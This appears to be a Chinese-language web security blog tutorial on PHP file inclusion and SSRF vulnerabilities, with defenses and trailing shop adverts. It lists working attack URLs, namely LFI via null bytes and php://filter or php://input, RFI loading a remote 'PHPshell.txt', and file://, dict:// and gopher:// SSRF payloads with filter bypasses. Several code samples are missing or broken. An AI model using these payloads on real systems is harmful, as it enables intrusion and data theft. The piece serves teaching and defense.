发布于2026-07-23 阅读(0)
扫一扫,手机访问
在Web安全领域,PHP应用程序的安全问题一直是绕不开的话题。今天咱们就来深入聊聊两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF)。无论你是刚入行的开发者,还是已经在安全圈摸爬滚打多年的老手,理解这些漏洞的原理、利用方式以及防御措施,都是基本功里不可或缺的一环。
文件包含漏洞,说白了,就是PHP应用程序里一个常见的“坑”。当开发者使用包含函数引入文件时,如果传入的文件名参数没有经过严格校验,攻击者就能趁机读取敏感文件,甚至执行恶意代码。这就像你家的大门没锁,任何人只要轻轻一推,就能进来翻箱倒柜。
危险函数
PHP中主要有四个文件包含函数,它们就像四个“兵器”,用法相似但各有特点:
1. 本地文件包含(LFI)
利用方式千变万化,但核心思路无非以下几种:
看个示例代码就明白了:
攻击者怎么利用呢?很简单,构造这样的URL:
http://www.example.com/demo1.php?file=flag.php%00
这里用到了空字节截断(PHP 5.3之前版本有效),不过现在更常见的做法是利用伪协议。
2. PHP伪协议利用
PHP伪协议是文件包含漏洞的“万能钥匙”,常用的有这么几个:
file:// 协议:直接读取本地文件
http://www.example.com/index.php?file=file://D:/phpStudy/WWW/flag.txt
php://filter:这个最常用,可以读取文件内容并经过base64编码返回,避免被直接执行
http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
php://input:结合POST请求,可以发送任意PHP代码
POST /index.php?file=php://input HTTP/1.1...
3. 远程文件包含(RFI)
比LFI更危险,因为它允许攻击者从远程服务器加载恶意代码。不过要触发它,需要满足两个前提条件:
来看一个典型的有漏洞代码:
攻击者只需要在可控参数里传一个远程地址:
http://www.example.com/demo4.php?param=http://www.xx.com/attacker/PHPshell.txt?
防御措施
说了这么多攻击手法,那怎么防呢?其实核心思路就两个字:校验。具体来说:
1. 白名单验证——只允许包含你明确允许的文件
2. 禁用危险配置:在php.ini里把这两个开关关掉
allow_url_fopen = Offallow_url_include = Off
3. 设置open_basedir——限制PHP能访问的文件目录
4. 严格校验用户输入——永远不要信任用户传来的任何数据
5. 避免动态包含——能用静态路径就别用变量
SSRF(Server-Side Request Forgery,服务器端请求伪造)这个名字听起来有点绕,但原理很简单:攻击者利用服务器作为“跳板”,去访问内网或外网本无法直接访问的资源。举个例子,你有一个服务器,它既能访问外网也能访问内网,攻击者通过控制这个服务器的请求,就能间接获取内网数据。
很多PHP函数都能发起网络请求,但如果不加限制,它们就成了SSRF的“温床”。
1. file_get_contents()
"; echo $img;}?>
这个函数接收一个URL作为参数,然后直接把内容保存到本地文件。如果攻击者传入内网地址,就能读取内网资源。
2. fsockopen()
fsockopen()可以建立任意TCP连接,如果攻击者能控制host和port,几乎可以访问任何服务。
3. curl_exec()
cURL库是PHP中最强大的网络请求工具,但也是最容易被利用的。攻击者可以通过它访问内网Redis、Memcached等服务,甚至利用Gopher协议发起更复杂的攻击。
很多开发者已经知道了SSRF的危害,会在代码里做简单过滤,比如只允许特定域名。但攻击者总有办法绕过——
1. IP编码绕过
可以使用xip.io这样的域名服务,比如:
10.0.0.1.xip.io
或者把IP地址转换成10进制、16进制等格式,让过滤函数认不出来。
2. 协议变换
即使限制只能使用HTTP,攻击者也可以尝试其他协议:
Dict协议:dict://192.168.1.1:8080/test:dict
Gopher协议:gopher://192.168.1.1/gopher
File协议:file:///etc/passwd
3. Gopher协议高级利用
Gopher协议是一个“万能”协议,可以模拟各种TCP服务:
FTP
Telnet
Redis
Memcache
比如,攻击者可以通过Gopher协议向Redis发送命令,写入SSH密钥或webshell:
4. filter_var()绕过
有些开发者用filter_var()来验证URL,但同样可以被绕过:
绕过方法很简单:利用URL解析的差异,比如:
http://example.com/test.php?url=0://192.168.1.1.com:8080;skysec.top:80/
5. 30x跳转绕过
如果代码设置了CURLOPT_FOLLOWLOCATION(跟随重定向),攻击者可以构造一个短网址,把用户请求重定向到内网地址:
防御SSRF的最佳实践
面对这么多花里胡哨的绕过方式,防御其实也有章可循:
文件包含漏洞和SSRF漏洞,虽然看起来风马牛不相及,但本质上都是对用户输入缺乏妥善处理。它们就像Web安全中的“老演员”,每年都会在无数漏洞报告中间出现。作为开发者,理解这些漏洞的原理和利用方式,不是为了“黑”别人,而是为了写出更安全的代码。安全是一个持续的过程,需要我们在每一行代码里都保持警惕——毕竟,最好的防御就是从一开始就避免漏洞。
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
正版软件
正版软件
正版软件
正版软件
正版软件
1
2
3
7
8